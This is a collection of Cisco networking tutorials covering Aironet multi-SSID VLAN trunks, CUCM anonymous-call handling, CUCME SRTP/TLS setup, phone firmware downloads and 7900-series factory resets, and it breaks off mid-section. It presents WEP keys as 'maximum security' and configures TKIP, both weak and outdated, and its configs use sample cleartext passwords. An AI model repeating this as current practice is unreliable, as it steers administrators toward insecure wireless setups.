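As an illustration of where the generated HEX string ends up, a static 128-bit WEP key (26 hexadecimal digits) is entered on an autonomous Aironet access point roughly as follows; the key value below is a placeholder, not a real key:

AP(config)# interface Dot11Radio0
! 128-bit WEP key: the 26 hex digits produced by the key generator
AP(config-if)# encryption key 1 size 128bit 0 112233445566778899AABBCCDD transmit-key
AP(config-if)# encryption mode wep mandatory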

The Wireless LAN Key Generator allows for quick and valid WEP/WPA key generation.

You can use the Random WEP/WPA Key Generator to generate a random WEP or WPA key. Simply choose the desired key length using the drop-down menu, and one will be generated for you.

The WEP/WPA Key Generator supports 64bit, 128bit, 152bit & 256bit WEP keys, and 160bit, 504bit WPA/WPA2 keys for maximum security.

Alternatively, if you need to generate a key based on a custom passphrase (the most common case), you can use the Custom WEP/WPA Key Generator. Just enter your passphrase into the Custom WEP/WPA Key Generator ASCII text field, and its HEX equivalent will be generated automatically. You can also insert the HEX value and the system will reveal the actual ASCII value, handy if you want to discover what passphrase has been used for the encryption.



WEP/WPA Key Generator

Note: use 5/13/16/29 characters for 64/128/152/256-bit WEP Encryption

Notes: WEP encryption uses a 24-bit "Initialization Vector" in addition to the "secret key". Therefore, 40-bit WEP can be referred to as 64-bit WEP, and 104-bit can be referred to as 128-bit, depending on whether the "Initialization Vector" is counted or not.



Cisco Aironet 1242AG /1240 - Multiple SSID & 802.1q Trunk VLAN Link Configuration

This article explains how the Cisco 1240 series access point can be set up to provide support for multiple SSIDs, each SSID assigned to a separate VLAN.  This type of configuration is ideal for supporting different wireless networks, each one with its own characteristics.

A frequently used setup of Cisco access points involves at least one wireless network (SSID) for accessing the local network (VLAN 1) and another SSID for Internet access (Guest VLAN).

It is important to note that this guide is also valid for the following Cisco Access Points: Cisco Aironet 1240 Series, Cisco Aironet 1040 Series, Cisco Aironet 1130 AG Series, Cisco Aironet 1140 Series, Cisco Aironet 1200 Series, Cisco Aironet 1250 Series and Cisco Aironet 1260 Series.  Configuration of multiple SSIDs with trunk links is almost identical, with minor differences in the interfaces (where we have more than one radio) and channels, depending on whether there is support for 802.11a/b/g/n.
Cisco 1242AG Multiple SSID VLAN Trunk Link

Cisco Access Point Multiple SSID Configuration 

Configuring multiple SSIDs on a Cisco access point is a straightforward process, however it does contain a few details we will analyse as we progress.

We now need to create the two SSIDs by defining their names (which will be broadcast so users can find them), encryption methods and keys, and VLAN assignments.

AP (config)# dot11 ssid Company
AP (config-ssid)# vlan 1
AP (config-ssid)# authentication open
AP (config-ssid)# authentication key-management wpa
AP (config-ssid)# guest-mode
AP (config-ssid)# mbssid guest-mode
AP (config-ssid)# infrastructure-ssid optional
AP (config-ssid)# wpa-psk ascii 0 firewall.cx
AP (config-ssid)# exit
AP (config)# dot11 ssid Hotspot
AP (config-ssid)# vlan 2
AP (config-ssid)# authentication open
AP (config-ssid)# authentication key-management wpa
AP (config-ssid)# mbssid guest-mode
AP (config-ssid)# wpa-psk ascii 0 free-access
AP (config-ssid)# exit
AP (config)# dot11 vlan-name vlan1 vlan 1
AP (config)# dot11 vlan-name vlan2 vlan 2

The above configuration is quite different from setups with a single SSID, the reason being the additional SSID and VLAN configuration required to ensure each SSID is assigned to the correct VLAN. The 'Company' wireless network is assigned to VLAN 1 and the 'Hotspot' wireless network to VLAN 2.

Notice that when using multiple SSIDs on a Cisco Aironet access point, it is imperative to use the mbssid guest-mode command, otherwise the SSID name of the wireless network will not be broadcast correctly.

The 'dot11 vlan-name' command ensures the correct mapping of VLANs to their respective VLAN names. In our example, the VLAN names follow the actual VLANs, so VLAN 1 has been named 'vlan1'. This helps keep track of them.

Next, we must ensure the integrated routing and bridging (IRB) feature is enabled to allow the routing of our protocols (IP) between routed interfaces and bridge groups. This command is most likely already present in the configuration, but let's play safe and enter it:

AP (config)# bridge irb

Configuring The Dot11Radio0 Interface

Configuring the Dot11Radio0 interface is our next step. Dot11Radio0 is the actual radio interface of the integrated Cisco access point.  We will need to assign the SSIDs configured previously to this interface, along with the encryption methods and a few more parameters.

AP (config)# interface Dot11Radio0
AP (config-if)# encryption vlan 1 mode ciphers tkip
AP (config-if)# encryption vlan 2 mode ciphers tkip
AP (config-if)# ssid Company
AP (config-if)# ssid Hotspot
AP (config-if)# mbssid
AP (config-if)# station-role root
AP (config-if)# speed  basic-1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 24.0 36.0 48.0 54.0
AP (config-if)# channel 2462

Most commands are self-explanatory. We will however explain the basic and important ones:

The Encryption VLAN commands set the encryption mode for each VLAN and, therefore, each SSID.  

The SSID command assigns the SSIDs to this interface.

The mbssid command ensures both SSIDs are broadcast and are viewable to our wireless clients.

The station-role root command is a default command and makes the access point act as a root station, in other words an access point connected to the wired LAN.

Note the speed command. This too is a default command that sets the supported data rates. The rates from 1.0 to 54.0 Mbps cover the 802.11b/g protocol. If you have a dual-radio access point you can configure the Dot11Radio1 (second radio) interface accordingly.

Configuring The Dot11Radio0 Sub-interfaces

At this point we are required to configure sub-interfaces on Dot11Radio0, assigning each sub-interface to a VLAN.

AP (config)# interface Dot11Radio0.1
AP (config-subif)# encapsulation dot1Q 1 native
AP (config-subif)# no ip route-cache
AP (config-subif)# bridge-group 1
AP (config-subif)# bridge-group 1 subscriber-loop-control
AP (config-subif)# bridge-group 1 block-unknown-source
AP (config-subif)# no bridge-group 1 source-learning
AP (config-subif)# no bridge-group 1 unicast-flooding
AP (config-subif)# bridge-group 1 spanning-disabled
AP (config-subif)# exit
AP (config)# interface Dot11Radio0.2
AP (config-subif)# encapsulation dot1Q 2
AP (config-subif)# no ip route-cache
AP (config-subif)# bridge-group 2
AP (config-subif)# bridge-group 2 block-unknown-source
AP (config-subif)# no bridge-group 2 source-learning
AP (config-subif)# no bridge-group 2 unicast-flooding
AP (config-subif)# bridge-group 2 spanning-disabled

When creating the subinterfaces, we always use easy-to-identify methods of mapping. Thus, interface Dot11Radio0.1 means this interface will be mapped to VLAN 1, while interface Dot11Radio0.2 will map to VLAN 2.

The encapsulation dot1Q 1 native command serves two purposes. It maps VLAN 1 to sub-interface Dot11Radio0.1 and tells the access point that this VLAN (1) is the native VLAN.  This means that untagged VLAN traffic belongs to VLAN 1.  More information on VLANs is available in our VLAN Section - be sure to visit it.

Similarly, under interface Dot11Radio0.2, the encapsulation dot1Q 2 command maps VLAN 2 traffic to this sub-interface.

The bridge-group command assigns each sub-interface to a bridge group. Each sub-interface is assigned to its own bridge-group. The bridge group essentially connects the wireless sub-interfaces with the Fast Ethernet interface this access point has. This is analysed below.

Configuring Cisco 1242AG / 1240 Access Point Fast Ethernet0, Sub-Interfaces & BVI interface

As with all Cisco Aironet access points, you'll find a FastEthernet0 interface that is used to connect the access point to our LAN switch. On Cisco Aironet models that support 802.11n technology, e.g. the Cisco Aironet 1140, this interface is replaced with a Gigabit Ethernet interface, designed to handle the increased capacity and throughput of the access point.

Following is the configuration required to create the necessary FastEthernet sub-interfaces and map them to the Dot11Radio0.X sub-interfaces previously created:

AP (config)# interface FastEthernet0
AP (config-if)# no ip address
AP (config-if)# no ip route-cache
AP (config-if)# exit

AP (config)# interface FastEthernet0.1
AP (config-if)#  encapsulation dot1Q 1 native
AP (config-if)#  no ip route-cache
AP (config-if)#  bridge-group 1
AP (config-if)#  no bridge-group 1 source-learning
AP (config-if)#  bridge-group 1 spanning-disabled
AP (config-if)# exit

AP (config)# interface FastEthernet0.2
AP (config-if)# encapsulation dot1Q 2
AP (config-if)# no ip route-cache
AP (config-if)# bridge-group 2
AP (config-if)# no bridge-group 2 source-learning
AP (config-if)# bridge-group 2 spanning-disabled
AP (config-if)# exit

AP (config)# interface BVI1
AP (config-if)# ip address 192.168.30.5 255.255.255.0
AP (config-if)# no ip route-cache

The FastEthernet interface and sub-interface configuration follows the same logic as the Dot11Radio0 interface. Notice that each FastEthernet sub-interface is mapped to the same VLAN and bridge-group as the Dot11Radio0 sub-interfaces.  

Next, we create the one and only BVI1 interface and assign it an IP Address. This is basically the IP Address of our access point and is reachable from our LAN network, so it's best to assign it an IP Address from your LAN network (VLAN 1).

It is important to note that only one bridge-interface (BVI Interface) is configured with an IP Address. The rest of the bridge groups are not required to have a BVI interface as all traffic is trunked through the BVI1 Interface. This is per Cisco design.

Finally, we must enable ip routing for bridge 1:

AP (config)# bridge 1 protocol ieee
AP (config)# bridge 1 route ip
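For completeness, the switch port to which the access point's FastEthernet0 interface connects must be configured as an 802.1Q trunk carrying both VLANs, with VLAN 1 as the native VLAN to match the encapsulation dot1Q 1 native command used above. A minimal sketch, assuming a Catalyst switch and port FastEthernet0/10:

Switch(config)# interface FastEthernet0/10
Switch(config-if)# description Trunk link to Cisco 1242AG Access Point
! Older Catalyst platforms may also require: switchport trunk encapsulation dot1q
Switch(config-if)# switchport mode trunk
Switch(config-if)# switchport trunk native vlan 1
Switch(config-if)# switchport trunk allowed vlan 1,2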

Configuring DHCP Service For Both VLAN Interfaces

The first step is to define the DHCP service and IP address pools for our two VLANs and, therefore, SSIDs.

If you prefer to configure the DHCP service on your Cisco router, detailed instructions can be found in our Cisco Router DHCP Server Configuration article.

To help make it easy, we are providing the necessary commands for our example:

AP(config)# ip dhcp excluded-address 192.168.30.1 192.168.30.20
AP(config)# ip dhcp excluded-address 192.168.40.1 192.168.40.20

AP(config)# ip dhcp pool Company
AP(dhcp-config)# network 192.168.30.0 255.255.255.0
AP(dhcp-config)# dns-server 192.168.30.1
AP(dhcp-config)# default-router 192.168.30.1

AP(config)# ip dhcp pool Hotspot
AP(dhcp-config)# network 192.168.40.0 255.255.255.0
AP(dhcp-config)# default-router 192.168.40.1
AP(dhcp-config)# dns-server 192.168.40.1

This configuration assumes that your router has two VLAN interfaces configured with the appropriate Internet access and Firewall configuration.

On another note, NAT Overload is required in most cases to ensure both VLAN networks have Internet access.  This is covered extensively in our Cisco Router NAT Overload article.

Summary

This article provided in-depth coverage of how to configure a Cisco Aironet 1242AG / 1240 series access point to support multiple SSID wireless networks and connect via an 802.1q trunk link to a local switch.  The information provided not only covers the basic commands, but also analyses the background theory and logic, to ensure the reader fully understands why this configuration method is used.


How To Stop CallManager (CUCM) 7, 8, 9, 10.5 with MGCP / H.323 Voice Gateway From Rejecting Anonymous (Hidden Caller-ID) Calls

Cisco Unified CallManager (CUCM) and its Voice Gateway rely on the telecommunication provider (telco) to send the correct call details for every incoming call, to allow the system to correctly process and route it.

One problem many engineers stumble upon is the routing of incoming calls which have their caller-ID blocked.  In these cases, quite a few telcos send 'anonymous' as the Calling Party Number (the number that is calling us) instead of the typical N/A string:

Jan 30 07:42:16.892: ISDN Se0/1/0:15 Q931: RX <- SETUP pd = 8  callref = 0x1075
 Sending Complete      
 Bearer Capability i = 0x8090A3
                Standard = CCITT
                Transfer Capability = Speech 
                Transfer Mode = Circuit
                Transfer Rate = 64 kbit/s
        Channel ID i = 0xA98381
                Exclusive, Channel 1
        Calling Party Number i = 0x0180, 'anonymous'
                Plan:ISDN, Type:Unknown
        Called Party Number i = 0x81, '0298889994'
                Plan:ISDN, Type:Unknown
Jan 30 07:42:16.900: ISDN Se0/1/0:15 Q931: TX -> CALL_PROC pd = 8  callref = 0x9075
        Channel ID i = 0xA98381
                Exclusive, Channel 1
Jan 30 07:42:16.904: ISDN Se0/1/0:15 Q931: TX -> DISCONNECT pd = 8  callref = 0x9075
        Cause i = 0x8095 - Call rejected
Jan 30 07:42:16.912: ISDN Se0/1/0:15 Q931: RX <- RELEASE pd = 8  callref = 0x1075
Jan 30 07:42:16.944: ISDN Se0/1/0:15 Q931: TX -> RELEASE_COMP pd = 8  callref = 0x9075

The problem becomes more difficult to solve when the Voice Gateway is configured to use MGCP (Media Gateway Control Protocol) as the control protocol with CUCM. With MGCP, there is no control over manipulating the Calling Party Number (as opposed to H.323). Despite this drawback, most engineers use MGCP as it dramatically simplifies the configuration on both CUCM and the Voice Gateway.

By default, all CUCM versions from version 6 and above will automatically reject calls when the Calling Party Number is set to Anonymous, making it impossible for callers with a hidden ID to successfully call the company.

Solutions To Stop CUCM From Rejecting Anonymous Caller-IDs

One solution is to request that the telco replace the Anonymous Calling Party Number with a specific numeric string. The chances of this happening are quite slim.

Another solution is to convert your MGCP Voice Gateway to H.323. This allows the use of translation patterns for all incoming calls, manually changing Anonymous to whatever is required to ensure the call is not rejected.

The final solution is to dive into each Directory Number (DN) and un-tick the Reject Anonymous Calls option, under the Directory Number Settings section. The Reject Anonymous Calls feature is enabled by default and will cause CUCM to reject all anonymous incoming calls:

cucm-rejecting-anonymous-caller-id-workaround-2

When done, simply click Save and you're done! Simple, fast and effective!


Secure CallManager Express Communications - Encrypted VoIP Sessions with SRTP and TLS

In this article we discuss the security and encryption of Cisco Unified Communications Manager Express (CUCME), which is an integral part of Cisco UC and, more specifically, of the Cisco Express call-processing regime.

Voice over IP (VoIP) is not just the need of the hour for most enterprises; it is something their business depends on, to the degree that without IP communications in place their business processes and revenue streams would fall apart. In such a case it goes without saying that the security of voice networks is one of the chief concerns when it comes to the security of intellectual capital and customer data. More often than not, one of the first thoughts is how to secure the VoIP network itself, which is leveraged by IP Telephony / Unified Communications (UC) applications.

So what is the most commonly sought-after yet elusive security control which plays an indispensable role in securing a VoIP network? Your guess is as good as mine: it is encryption! Now, you are well within your rights to ask why it is elusive. The simple answer is that while encryption can help you succeed and protect the privacy of communications, it can also be detrimental for various functions and organizations; for example, monitoring secure calls is not a trivial task, and encrypting all endpoints has an impact on platform sizing and performance.

The use of authentication and encryption helps protect confidentiality and makes it harder for malicious insiders or outsiders to tamper with the signaling and media streams, the CUCME router, and the IP phones. When the CUCME security features are enabled, i.e. media encryption (SRTP) and signaling encryption (TLS), the communication between Cisco Unified IP Phones and CUCME, as well as between phones, is encrypted as shown in Figure 1:

Figure 1 - CUCME to Cisco IP Phone SRTP and TLS

Let’s go over some of the assumptions, requirements and caveats before we delve further into the CUCME security configuration.

Assumptions For CUCME Encryption

  • It is assumed that CUCME is configured and operational (without security in place); this article only serves to elucidate the process of implementing authentication and encryption on the CUCME
  • It must also be understood that authentication is an integral part of the overall security construct when the discussion is around encryption, since authentication provides integrity whereas encryption provides privacy.

Requirements For CUCME Encryption

  • Enabling CUCME encryption requires Cisco IOS feature set Advanced Enterprise Services (adventerprisek9) or Advanced IP Services (advipservicesk9)
  • CUCME version 4.2 or later is required to provide media encryption
  • Supported platforms include 2800, 2900, 3200, 3800, and 3900 series routers
  • Network Time Protocol (NTP) must be enabled to ensure the certificate dates are correct and to check validity of certificates
  • An IOS CA to sign the various certificates (on the same router as CUCME or on a different router)

Caveats For CUCME Encryption

  • Secure three-way software conference is not supported therefore, while in conference, the call falls back to plain RTP. However, if a party drops from a three-party conference, the call between the remaining two parties returns to a secure state (if the two endpoints are configured for encryption)
  • Media and signaling encryption requires the Cisco CTL client service
  • Calls to Cisco Unity Express (CUE) do not support SRTP or TLS for media and signaling respectively
  • Music on Hold (MOH) does not support encryption
  • Modem relay and T.3 fax relay calls do not support encryption
  • Secure CUCME does not support Session Initiation Protocol (SIP) trunks and only H.323 trunks are supported (with IPSec for signaling protection)

With the above in mind, let’s take a deep dive into enabling security (encryption and authentication) for Cisco Unified IP Phones on CUCME.

Enabling SRTP & TLS On CUCME For Endpoints

As with any PKI hierarchy, enabling encryption (and authentication) on CUCME requires the use of a Certificate Authority (CA) server/process. The CA can be configured on the same router on which the CUCME application is running, or it can be a different IOS router (dedicated to the CA function in an organization). The major function of the CA for CUCME security is to provide certificates, the duration for which certificates are valid, and the trust relationship between different entities by virtue of certificates.

 Configuring IOS Certificate Authority (CA)

The following commands are required to configure the IOS CA. For the following example, we are enabling the CA on the same router as that of CUCME.

First we must ensure that the HTTP server on the router is enabled since, by default, TCP port 80 will be used for granting certificates and for accepting certificate signing requests by the IOS CA.

CUCME(config)# ip http server

Now, we need to configure the CA process and enable CA process:

CUCME(config)# crypto pki server CA
CUCME(ca-server)# database level complete
CUCME(ca-server)# database url nvram:
CUCME(ca-server)# grant auto
CUCME(ca-server)# lifetime certificate 1095
CUCME(ca-server)# lifetime ca-certificate 1095
CUCME(ca-server)# no shutdown

Finally, define the CA trustpoint and (globally) define the enrollment URL:

CUCME(config)# crypto ca trustpoint CA
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none

At this time, we are done with the CA server definition. The next step is to define the various certificates which will be used for the CUCME security processes (CME, TFTP, CAPF and so on).

Generate Certificates For Enabling Security

A number of certificates must be generated, by creating a trustpoint and enrolling it with the CA, to enable the various security processes on CUCME. Although CUCME supports leveraging a single trustpoint for all certificate functions, it is a leading-practice recommendation to have different trustpoints for different certificate functions, as this makes it easier to manage certificate expiry, revocation, regeneration and so on.

The different certificates required for SRTP and TLS are:

  • CUCME
  • TFTP
  • CAPF
  • SAST tokens

Creating a Certificate For CUCME, TFTP, CAPF, SAST1 & SAST2 Processes

Following commands outline the process to generate the certificate for the secure CME function:

CUCME(config)# crypto pki trustpoint CUCME
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none
CUCME(ca-trustpoint)# rsakeypair CUCME

The next step to creating the certificate is to authenticate and enroll the trust point with the Certificate Authority.

Note: Each of the commands, i.e. trustpoint authenticate and enroll, provides interactive prompts. Extraneous output has been omitted.

Authenticating & Enrolling the CUCME Trustpoint:

CUCME(config)# crypto pki authenticate CUCME
<output omitted>
% Do you accept this certificate? [yes/no]: yes
Trustpoint CA certificate accepted.

CUCME(config)# crypto pki enroll CUCME
% Start certificate enrollment ..
<output omitted>
Password: *******
Re-enter password: *******
<output omitted>
Request certificate from CA? [yes/no]: yes
% Certificate request sent to Certificate Authority

Next, we define the other trustpoints, and authenticate and enroll them with the Certificate Authority.

TFTP Trustpoint definition:

CUCME(config)# crypto pki trustpoint TFTP
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none
CUCME(ca-trustpoint)# rsakeypair TFTP

 Authenticating and enrolling TFTP trustpoint:

CUCME(config)# crypto pki authenticate TFTP
<output omitted>
!
CUCME(config)# crypto pki enroll TFTP
<output omitted>

 CAPF Trustpoint definition:

CUCME(config)# crypto pki trustpoint CAPF
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none
CUCME(ca-trustpoint)# rsakeypair CAPF

 Authenticating and enrolling CAPF trustpoint:

CUCME(config)# crypto pki authenticate CAPF
<output omitted>
!
CUCME(config)# crypto pki enroll CAPF
<output omitted>

 SAST1 Trustpoint definition:

CUCME(config)# crypto pki trustpoint SAST1
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none
CUCME(ca-trustpoint)# rsakeypair SAST1

 Authenticating and enrolling SAST1 trustpoint:

CUCME(config)# crypto pki authenticate SAST1
<output omitted>
!
CUCME(config)# crypto pki enroll SAST1
<output omitted>

SAST2 Trustpoint definition:

CUCME(config)# crypto pki trustpoint SAST2
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none
CUCME(ca-trustpoint)# rsakeypair SAST2

Authenticating and enrolling SAST2 trustpoint:

CUCME(config)# crypto pki authenticate SAST2
<output omitted>
!
CUCME(config)# crypto pki enroll SAST2
<output omitted>

Enabling CAPF server on CUCME
As with CUCM, the Certificate Authority Proxy Function (CAPF) server is responsible for issuing CTL-signed Locally Significant Certificates (LSCs). The following commands enable the CAPF server on CUCME.

CUCME(config)# capf-server
CUCME(config-capf-server)# trustpoint-label CUCME
CUCME(config-capf-server)# cert-enroll-trustpoint CA password 0 cisco123
CUCME(config-capf-server)# phone-key-size 1024
CUCME(config-capf-server)# port 3084
CUCME(config-capf-server)# auth-mode null-string
CUCME(config-capf-server)# source-addr 10.10.10.1

Invoking IOS CTL Client 
The final step, before an e-phone can be configured for encryption and authentication, is to enable the Certificate Trust List (CTL) client on CUCME. The CTL client signs the list of servers which can be trusted by a Cisco IP Phone with the certificates generated earlier (CUCME, TFTP, CAPF and so on).

The IP Phone will download the CTL file via TFTP and store the file on the phone. This is analogous to the CUCM CTL, and the CTL client must be configured explicitly on IOS to leverage the various certificates.

CUCME(config)# ctl-client
CUCME(config-ctl-client)# server cme 10.10.10.1 trustpoint CUCME
CUCME(config-ctl-client)# server tftp 10.10.10.1 trustpoint TFTP
CUCME(config-ctl-client)# server capf 10.10.10.1 trustpoint CAPF
CUCME(config-ctl-client)# sast1 trustpoint SAST1
CUCME(config-ctl-client)# sast2 trustpoint SAST2
CUCME(config-ctl-client)# regenerate

Configuring Telephony-Service To Leverage Security

CUCME supports configuring endpoints for SRTP (media) and TLS (signaling). Once the aforementioned steps are concluded, CUCME needs to be configured to use the defined certificates for the different functions. The following commands in telephony-service mode enable authenticated TFTP file transfer and TLS for signaling.

CUCME(config)# telephony-service
CUCME(config-telephony)# secure-signaling trustpoint CUCME
CUCME(config-telephony)# tftp-server-credentials trustpoint TFTP
CUCME(config-telephony)# server-security-mode secure
CUCME(config-telephony)# cnf-file perphone
CUCME(config-telephony)# cnf-file location flash:

Configuring Endpoints (E-Phones) For Security

The final step is to configure the e-phones for security mode. There are two ways to do this:

  • Configure e-phone (device) security at global mode for all supported phone models
  • Configure e-phone (device) security mode on a device by device basis


Configuring Device Security at Global Level
To enable security at global level in CUCME for all Cisco IP Phones which support encryption and authentication, issue the following commands in global configuration mode:

CUCME(config)# telephony-service
CUCME(config-telephony)# device-security-mode [authenticated | encrypted]
CUCME(config-telephony)# load-cfg-file flash:<filename> alias <alias> sign create
CUCME(config-telephony)# reset all

Configuring Device Security per Device Basis
In certain cases it may be necessary to apply encryption to some devices, authentication to others, and no security to the rest of the phones. In such cases, the commands can be entered at the e-phone level, on a phone-by-phone basis.

The following series of commands can be issued to enable security on a phone-by-phone basis:

CUCME(config)# ephone 110
CUCME(config-ephone)# mac-address 1234.1234.1234
CUCME(config-ephone)# device-security-mode [none | authenticated | encrypted]
CUCME(config-ephone)# cert-oper upgrade auth-mode null-string
CUCME(config-ephone)# reset

About the Author

Akhil Behl is a Solutions Architect with Cisco Advanced Services, focusing on Cisco Collaboration and Security Architectures. He leads collaboration and security projects worldwide for Cisco Advanced Services and the Collaborative Professional Services (CPS) portfolio. Prior to his current role, he spent ten years working in various roles at Linksys as a Technical Support Lead, as an Escalation Engineer at Cisco Technical Assistance Center (TAC), and as a Network Consulting Engineer in Cisco Advanced Services. Akhil has a bachelor of technology degree in electronics and telecommunications from IP University, India, and a master’s degree in business administration from Symbiosis Institute, India.

Summary

Cisco Unified Communications Manager Express (CUCME) is an indispensable component of Cisco’s UC Express portfolio and has CUCM-like capabilities. Moreover, CUCME can provide enterprise-wide security by empowering you to enable media and signaling encryption between CUCME and the phones. This article outlines the capabilities of CUCME to support encryption and authentication for phone calls and signaling. The process to enable and pull together CUCME security may seem daunting at first; however, it is a one-time configuration and can go a long way in safeguarding an organization’s voice channels.


Cisco SPA525G / SPA525G2 User Guide Free Download

Available as a free download in our Cisco Small Business Series Product Datasheet section is the Cisco SPA525G / SPA525G2 User Guide. This 68 page user guide contains all the necessary information on how to setup, configure and customise your Cisco SPA525 IP phone.

Topics covered include:

  • Getting started
  • Understanding your phone lines and buttons
  • Using the keypad, buttons and menus
  • Using the Cisco Attendant Console
  • Connecting your IP phone to the network
  • Updating firmware
  • Phone functions (calling, volume, call-on-hold, live call, call pick-up, phone directories, call history lists, transferring calls and much more)
  • Advanced phone functions (pairing SPA525 with bluetooth device, mobile phone battery and signal info on your SPA525, playing mp3 files, play lists and more)
  • Configuring IP phone screen (contrast, brightness, wallpaper, screensaver)
  • Viewing network information
  • ...and much more!

Download your free copy by visiting the Firewall.cx Cisco Small Business Series Product Datasheet section.


Cisco Small Business SPA500 IP Phone Series Administration Guide Free Download

Firewall.cx readers can now access and freely download the Cisco Small Business Administration Guide for Cisco SPA500 series IP phones.

The Administration Guide for Cisco SPA500 series IP phone covers basic and advanced configuration of the following IP phones:
SPA301, SPA303, SPA501G, SPA502G, SPA504G, SPA508G, SPA509G, SPA512G, SPA514G, SPA525G, SPA525G2 and WIP310 model.

Features covered in this extensive 332-page guide include:

  • Getting the IP phones to work with the Cisco SPA900 IP PBX
  • Network Configuration
  • Determining and Upgrading your IP phone firmware
  • Web-Based Configuration Utility - Allowing web-access to the IP phone
  • Configuring Line Key (shares-lines, call appearance, access services, busy lamp, call-pickup, speed dials and much more)
  • Customizing the IP phone (background image, screen save, LCD brightness, backlight settings)
  • Enabling Call Features (Caller ID Blocking Services, call-back service, call transfer, conferencing, do-not-disturb)
  • Customizing phone softkeys
  • Configuring ring tones
  • Configuring audio settings
  • Configuring Bluetooth (Cisco SPA525G / SPA525G2 only)
  • Enabling SMS
  • Configuring LDAP for Cisco SPA300 and SPA500 series IP phones
  • Configuring SIP (Basic parameters, RTP parameters, SIP settings)
  • Managing NAT Traversal with Cisco IP phones
  • Configuring Security, Quality and Network Features
  • Configuring VLAN settings
  • Configuring Dial Plans (Digit Sequences, examples, off-hook timers and more)
  • and much more!

To download the Cisco Small Business Administration Guide for Cisco SPA500 series IP phones, simply visit our new Cisco Small Business Series Product Datasheet download section.


Free Cisco IP Phone & ATA Firmware (SCCP & SIP) Download Section

Firewall.cx readers can now download free Cisco firmware files for all Cisco IP Phones & Cisco ATA devices. Our new Cisco IP Phone & ATA Firmware Download section contains the latest SCCP (Skinny Protocol) and SIP files for immediate download.

As with all Firewall.cx downloads, no registration is required.

Firmware available currently covers the following Cisco IP phone & ATA models:

  • 7906 & 7911
  • 7910
  • 7912
  • 7914
  • 7915
  • 7916
  • 7920
  • 7921
  • 7925
  • 7926
  • 7931
  • 7935
  • 7936
  • 7937
  • 7940 & 7960
  • 7941 & 7961
  • 7942 & 7962
  • 7945 & 7965
  • 7970 & 7971
  • 7975
  • 7985
  • 8941 & 8945
  • 8961
  • 9951
  • 9971
  • ATA-186
  • ATA-187
  • ATA-188

IP Phone 7900 Series (7940, 7941, 7942, 7960, 7961, 7962, 7920) Factory Reset Procedure & Password Recovery

This article explains how to reset your Cisco 7940, 7941, 7942, 7960, 7961, 7962 & 7920 IP phone to factory defaults, and how to upgrade its firmware to the latest available version.

When initiating a factory reset procedure certain information from the IP phone is erased while other information is reset to its factory default value as shown in the list below:

 Information Erased:

  • CTL File (Certificate Trust List)
  • LSC File (Locally Significant Certificate)
  • IP Phone Call History (Calls Received, Placed, Missed etc)
  • Phone application

Information Reset to Default:

  • User configuration settings (ring tone, screen brightness, sound levels etc)
  • Network configuration settings

It is highly advisable to follow the firmware upgrade procedure in a non-working environment to ensure other phones are not affected (in case of an accidental IP phone reboot) and to avoid the freshly factory-reset IP phones obtaining the working environment’s settings.

Firewall.cx readers can visit our free Cisco IP Phone & ATA Firmware Download section to freely download the latest available firmware for their Cisco IP Phones. To learn how to configure your CallManager Express system for firmware upgrade, please read our Configuring CallManager Express (CME) for IP Phone Firmware Upgrade article 

Things To Consider Before Factory Resetting Your Cisco IP Phone

When performing the factory reset procedure we are about to describe, it is important to keep in mind that the IP phone will lose all configuration files and phone applications. This means that it is necessary to have CallManager or CallManager Express set up so that the IP phone will be able to receive the new information (phone application and configuration) after the reset procedure is complete, otherwise it is most likely that the IP phone will not be usable until this information is loaded onto it.

This preparation also happens to be the procedure for upgrading a Cisco IP phone firmware.

Performing the Factory Reset On Cisco 7940, 7960 IP Phones

Follow the steps below to successfully factory reset your Cisco 7940, 7960 IP phone:

  1. Unplug the power cable from the ip phone and then plug it back in.
  2. Immediately press and hold # and when the Headset, Mute and Speaker buttons begin to flash in sequence, release the # button.
  3. At this point, you’ll notice the Headset, Mute and Speaker buttons flash in sequence, indicating that the ip phone is waiting for you to enter the reset sequence.
  4. Press 123456789*0#  to begin the reset. If you accidentally press a key within the sequence twice, e.g. 1123456789*0#, the IP phone will still accept the code and begin the reset. If an invalid key is pressed, the phone will continue its normal startup procedure.
  5. Once the correct key sequence is entered, the ip phone will display the following prompt:  Keep network cfg? 1 = yes 2 = no 
  6. To maintain the current network configuration settings for the phone when the phone resets, press 1. To reset the network configuration settings when the phone resets, press 2. If you press another key or do not respond to this prompt within 60 seconds, the phone continues with its normal startup process and does not reset. Otherwise, the phone goes through the factory reset process.

Performing The Factory Reset On Cisco 7941, 7961 IP Phones

Follow the steps below to successfully factory reset your Cisco 7941, 7961 IP phone:

  1. Unplug the power cable from the IP phone and then plug it back in.
  2. Immediately press and hold # and, when the Headset, Mute and Speaker buttons begin to flash in sequence, release the # button.
  3. At this point, you’ll notice the Headset, Mute and Speaker buttons flash in sequence, indicating that the IP phone is waiting for you to enter the reset sequence.
  4. Press 123456789*0# to begin the reset. If you accidentally press a key within the sequence twice, e.g. 1123456789*0#, the IP phone will still accept the code and begin the reset. If an invalid key is pressed, the phone will continue its normal startup procedure.
  5. Once the correct key sequence is entered, the IP phone displays the following prompt and begins its reset process:  Upgrading

Performing The Factory Reset On Cisco 7942, 7962 IP Phones

Follow the steps below to successfully factory reset your Cisco 7942, 7962 IP phone:

  1. Unplug the power cable from the phone and then plug it back in. The phone begins its power up cycle.
  2. While the phone is powering up, and before the Speaker button flashes on and off, press and hold #. Continue to hold # until each line button flashes on and off in sequence in amber.
  3. Release # and press 123456789*0#.

You can press a key twice in a row, but if you press the keys out of sequence, the factory reset will not take place.

After you press these keys, the line buttons on the phone flash red and the phone goes through the factory reset process.

Do not power down the phone until it completes the factory reset process and the main screen appears.

Performing The Factory Reset On Cisco 7920 Wireless IP Phone

To reset a Cisco 7920, the IP phone must be started in administration mode using the following steps:

  1. Press the Menu softkey
  2. Press * (star), # (hash) and * (star) again.
  3. Press the Green phone key (used to answer a call) to open the administration mode.

Note: To hide these options again, power cycle the phone, or press any of the following keys while in the first-level submenu and then press the Green phone key:

